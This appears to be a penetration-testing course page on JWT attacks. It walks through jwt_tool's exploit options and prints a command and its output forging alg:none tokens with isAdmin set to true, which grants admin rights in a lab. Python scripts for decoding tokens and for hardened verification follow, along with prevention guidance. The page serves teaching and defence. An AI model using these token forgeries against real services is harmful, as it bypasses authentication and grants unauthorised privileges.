Attacking Authentication Mechanisms
Tools of the Trade & Vulnerability Prevention
This section will showcase tools that can aid us in identifying and exploiting JWT-based vulnerabilities. Furthermore, we will briefly explore how to prevent JWT-based vulnerabilities.
Tools of the Trade
Penetration testers commonly use jwt_tool to analyze and identify vulnerabilities in JWTs. The installation process only requires cloning the repository and installing the required dependencies:
[!bash!]$ git clone https://github.com/ticarpi/jwt_tool
[!bash!]$ pip3 install -r requirements.txt
We can then run the tool by executing the python script jwt_tool.py:
[!bash!]$ python3 jwt_tool/jwt_tool.py
<jwt_tool ASCII-art banner>
Version 2.2.6 @ticarpi
No config file yet created.
Running config setup.
Configuration file built - review contents of "jwtconf.ini" to customise your options.
Make sure to set the "httplistener" value to a URL you can monitor to enable out-of-band checks.
Let us take a look at the different functionalities the tool provides by calling its help flag:
[!bash!]$ python3 jwt_tool/jwt_tool.py -h
<SNIP>
-X EXPLOIT, --exploit EXPLOIT
eXploit known vulnerabilities:
a = alg:none
n = null signature
b = blank password accepted in signature
s = spoof JWKS (specify JWKS URL with -ju, or set in jwtconf.ini to automate this attack)
k = key confusion (specify public key with -pk)
i = inject inline JWKS
<SNIP>
-C, --crack crack key for an HMAC-SHA token
(specify -d/-p/-kf)
-d DICT, --dict DICT dictionary file for cracking
-p PASSWORD, --password PASSWORD
password for cracking
-kf KEYFILE, --keyfile KEYFILE
keyfile for cracking (when signed with 'kid' attacks)
<SNIP>
From the output of jwt_tool.py, we know that it can analyze JWTs, brute-force JWT secrets, and perform various other attacks, including those discussed in the previous sections.
JWT Analysis
We can analyze any given JWT with jwt_tool by providing it as an argument. Let us test it with a JWT from a previous section:
[!bash!]$ python3 jwt_tool/jwt_tool.py eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6ZmFsc2UsImV4cCI6MTcxMTE4NjA0NH0.ecpzHiyA5I1-KYTTF251bUiUM-tNnrIMwvHeSZf0eB0
=====================
Decoded Token Values:
=====================
Token header values:
[+] alg = "HS256"
[+] typ = "JWT"
Token payload values:
[+] user = "htb-stdnt"
[+] isAdmin = False
[+] exp = 1711186044 ==> TIMESTAMP = 2024-03-23 10:27:24 (UTC)
[-] TOKEN IS EXPIRED!
----------------------
JWT common timestamps:
iat = IssuedAt
exp = Expires
nbf = NotBefore
----------------------
As we can see, the tool provides us with all the information contained in the JWT, including the JWT's header and the JWT's payload. It even lets us know that the token provided has already expired since the timestamp in the exp claim was in the past.
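The decoding jwt_tool performs here is nothing more than splitting the token on dots, base64url-decoding the first two segments, and comparing the registered timestamp claims against the current time. As an added example (not part of the original page or of jwt_tool), the following Python script reproduces that analysis with only the standard library, using the HS256 token and one of the alg:none tokens from this page as input. Timestamps are rendered in UTC; nothing is verified, this is inspection only.

```python
import base64
import json
import time
from datetime import datetime, timezone

# Tokens taken from the page: the HS256 token analyzed above and one of the
# unsigned alg:none tokens jwt_tool generates in the forging section.
PAGE_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6ZmFsc2UsImV4cCI6MTcxMTE4NjA0NH0."
    "ecpzHiyA5I1-KYTTF251bUiUM-tNnrIMwvHeSZf0eB0"
)
PAGE_NONE_TOKEN = (
    "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0."
    "eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6dHJ1ZSwiZXhwIjoxNzExMTg2MDQ0fQ."
)

# The registered timestamp claims jwt_tool lists at the end of its analysis.
TIMESTAMP_CLAIMS = {"iat": "IssuedAt", "exp": "Expires", "nbf": "NotBefore"}


def b64url_decode(segment: str) -> bytes:
    """Decode a base64url segment, restoring the '=' padding that JWTs strip."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt(token: str) -> dict:
    """Split a compact JWS into header, payload and raw signature segment.
    Nothing is verified here; this mirrors jwt_tool's default inspection mode."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError(f"expected 3 dot-separated segments, got {len(parts)}")
    return {
        "header": json.loads(b64url_decode(parts[0])),
        "payload": json.loads(b64url_decode(parts[1])),
        "signature": parts[2],
    }


def analyze_jwt(token: str, now=None) -> dict:
    """Report header/payload values plus the exp/nbf time checks jwt_tool performs."""
    now = int(time.time()) if now is None else now
    decoded = decode_jwt(token)
    payload = decoded["payload"]
    timestamps = {}
    for claim, meaning in TIMESTAMP_CLAIMS.items():
        if isinstance(payload.get(claim), int):
            when = datetime.fromtimestamp(payload[claim], tz=timezone.utc)
            timestamps[claim] = (meaning, when.isoformat())
    return {
        "header": decoded["header"],
        "payload": payload,
        "timestamps": timestamps,
        "expired": isinstance(payload.get("exp"), int) and payload["exp"] <= now,
        "not_yet_valid": isinstance(payload.get("nbf"), int) and payload["nbf"] > now,
        # An empty third segment is what an alg:none token looks like on the wire.
        "unsigned": decoded["signature"] == "",
    }


if __name__ == "__main__":
    for token in (PAGE_TOKEN, PAGE_NONE_TOKEN):
        report = analyze_jwt(token)
        print("Token header values:")
        for k, v in report["header"].items():
            print(f"  [+] {k} = {v!r}")
        print("Token payload values:")
        for k, v in report["payload"].items():
            print(f"  [+] {k} = {v!r}")
        for claim, (meaning, when) in report["timestamps"].items():
            print(f"  {claim} ({meaning}) ==> {when}")
        if report["expired"]:
            print("  [-] TOKEN IS EXPIRED!")
        if report["unsigned"]:
            print("  [-] TOKEN CARRIES NO SIGNATURE!")
        print("-" * 22)
```

Because `now` can be passed explicitly, the same function can be used in a test harness or a log-review script to evaluate a captured token as of the time it was actually presented, rather than as of now.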
Forging JWTs
We can use jwt_tool to programmatically forge altered JWTs instead of doing so manually, as in the previous sections. For instance, we can forge a JWT which uses the none algorithm by specifying the -X a flag. Additionally, we can tell the tool to set the isAdmin claim to true by specifying the following flags: -pc isAdmin -pv true -I. Let us combine these flags to forge a JWT that enables us to obtain administrator privileges in the lab from the previous sections:
[!bash!]$ python3 jwt_tool/jwt_tool.py -X a -pc isAdmin -pv true -I eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6ZmFsc2UsImV4cCI6MTcxMTE4NjA0NH0.ecpzHiyA5I1-KYTTF251bUiUM-tNnrIMwvHeSZf0eB0
<SNIP>
jwttool_811c498343f37b0d48592a9743187ebf - EXPLOIT: "alg":"none" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6dHJ1ZSwiZXhwIjoxNzExMTg2MDQ0fQ.
jwttool_fb9f8d45657b7264e23d8e17a2cc438e - EXPLOIT: "alg":"None" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOb25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6dHJ1ZSwiZXhwIjoxNzExMTg2MDQ0fQ.
jwttool_c2d4f2dda19221badff0ee7d78e80575 - EXPLOIT: "alg":"NONE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJOT05FIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6dHJ1ZSwiZXhwIjoxNzExMTg2MDQ0fQ.
jwttool_367f25ee04f77adb0cb665bf07d80f3c - EXPLOIT: "alg":"nOnE" - this is an exploit targeting the debug feature that allows a token to have no signature
(This will only be valid on unpatched implementations of JWT.)
[+] eyJhbGciOiJuT25FIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6dHJ1ZSwiZXhwIjoxNzExMTg2MDQ0fQ.
As we can see, the tool generated JWTs that use the none algorithm with various lower- and uppercase combinations, aiming to bypass potential blacklists. We can confirm that the token contains the claims we injected by analyzing it with jwt_tool:
The JWT's header contains alg set to none, and the payload contains the injected value for the isAdmin claim. Passing this token to the corresponding lab from a few sections ago grants us administrator privileges:

Feel free to revisit the previous sections and try to solve the labs with jwt_tool to get experience with the tool.
Vulnerability Prevention
It is crucial to abide by the following items to prevent vulnerabilities in JWT-based authentication implementations:
- Plan and document the JWT configuration that the web application uses. This configuration includes the signature algorithm as well as which claims are used by the web application.
- Do not implement custom JWT handling logic. Instead, rely on established libraries to handle JWT operations such as signature generation, signature verification, and claim extraction. Ensure that the library used is up to date.
- Tie the JWT handling logic down to suit the corresponding JWT configuration. For instance, reject tokens that are not signed with the expected signature algorithm.
- If claims such as the jku claim are used, implement a whitelist of allowed hosts before fetching any data from remote origins to prevent SSRF vulnerabilities.
- Always include an expiration date within the exp claim of the JWT to prevent JWTs from being valid indefinitely.
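The items above describe a verifier that is tied down to one documented configuration. As an added example (not part of the original page, and not a substitute for a maintained JWT library), the following Python verifier applies them to a constructed HS256 profile: the algorithm is pinned by exact string comparison, headers that point at remote or inline key material are refused, the signature is checked before any claim is trusted, and the documented claims and lifetime are enforced. The secret, the required-claim list and the jku allowlist host are constructed for the example; the tokens it is run against are the HS256 token and the alg:none forgeries from this page.

```python
import base64
import hashlib
import hmac
import json
import time
from urllib.parse import urlparse

# Constructed JWT profile for this example (none of these values come from the page):
# the documented configuration the verifier is tied down to.
EXPECTED_ALG = "HS256"
REQUIRED_CLAIMS = ("user", "isAdmin", "exp")
ALLOWED_JKU_HOSTS = {"keys.example.internal"}   # hypothetical allowlist, for apps that use jku
DEMO_SECRET = b"constructed-demo-secret-do-not-reuse"

# Tokens from the page: the original HS256 token and two of jwt_tool's alg:none forgeries.
PAGE_HS256_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6ZmFsc2UsImV4cCI6MTcxMTE4NjA0NH0."
    "ecpzHiyA5I1-KYTTF251bUiUM-tNnrIMwvHeSZf0eB0"
)
PAGE_NONE_TOKEN = "eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6dHJ1ZSwiZXhwIjoxNzExMTg2MDQ0fQ."
PAGE_NONE_MIXEDCASE_TOKEN = "eyJhbGciOiJuT25FIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiaHRiLXN0ZG50IiwiaXNBZG1pbiI6dHJ1ZSwiZXhwIjoxNzExMTg2MDQ0fQ."


def b64url_decode(seg: str) -> bytes:
    """Decode a base64url segment, restoring the padding JWTs strip."""
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def sign_hs256(payload: dict, secret: bytes) -> str:
    """Issue a token under the documented profile (used here to build known-good samples)."""
    header = {"alg": EXPECTED_ALG, "typ": "JWT"}
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode())
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{h}.{p}".encode(), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url_encode(sig)}"


def jku_allowed(url: str) -> bool:
    """Allowlist check for a jku URL: HTTPS only and an exact hostname match, so a
    verifier that does fetch keys never contacts an attacker-chosen origin (SSRF)."""
    parsed = urlparse(url)
    return parsed.scheme == "https" and parsed.hostname in ALLOWED_JKU_HOSTS


def verify_jwt(token: str, secret: bytes, now=None):
    """Return (True, payload) or (False, reason). Every check is tied to the documented profile."""
    now = int(time.time()) if now is None else now
    try:
        h_seg, p_seg, s_seg = token.split(".")
        header = json.loads(b64url_decode(h_seg))
        # 1. Pin the algorithm with an exact string compare: "none" in any casing,
        #    and every other algorithm, is rejected before the signature is touched.
        if header.get("alg") != EXPECTED_ALG:
            return False, f"unexpected alg {header.get('alg')!r}"
        # 2. This profile uses a static secret, so headers that select remote or
        #    inline key material have no legitimate use and are refused outright.
        if any(k in header for k in ("jku", "jwk", "x5u")):
            return False, "remote/inline key material not permitted"
        # 3. Constant-time signature check; a missing signature fails here as well.
        expected = hmac.new(secret, f"{h_seg}.{p_seg}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(s_seg)):
            return False, "bad signature"
        payload = json.loads(b64url_decode(p_seg))
    except ValueError as exc:  # wrong segment count, bad base64, bad JSON
        return False, f"malformed token: {exc}"
    # 4. Only now are the claims trusted: require the documented ones, enforce the lifetime.
    missing = [c for c in REQUIRED_CLAIMS if c not in payload]
    if missing:
        return False, f"missing claims {missing}"
    if not isinstance(payload["exp"], int) or payload["exp"] <= now:
        return False, "token expired or exp not an integer"
    if "nbf" in payload and payload["nbf"] > now:
        return False, "token not yet valid"
    return True, payload


if __name__ == "__main__":
    good = sign_hs256({"user": "htb-stdnt", "isAdmin": False, "exp": int(time.time()) + 300}, DEMO_SECRET)
    samples = [
        ("signed under the demo profile", good),
        ("same token, signature stripped", good.rsplit(".", 1)[0] + "."),
        ("page's alg:none forgery", PAGE_NONE_TOKEN),
        ("page's alg:nOnE forgery", PAGE_NONE_MIXEDCASE_TOKEN),
        ("page's HS256 token, signed under another key", PAGE_HS256_TOKEN),
    ]
    for label, tok in samples:
        print(f"{label}: {verify_jwt(tok, DEMO_SECRET)}")
```

The ordering matters: the algorithm and key-source checks run on the header before any cryptography, the signature is verified before the payload is even parsed, and the claims are read only from a payload whose integrity has been established. The same order is what a correctly configured library enforces when it is given a fixed list of accepted algorithms.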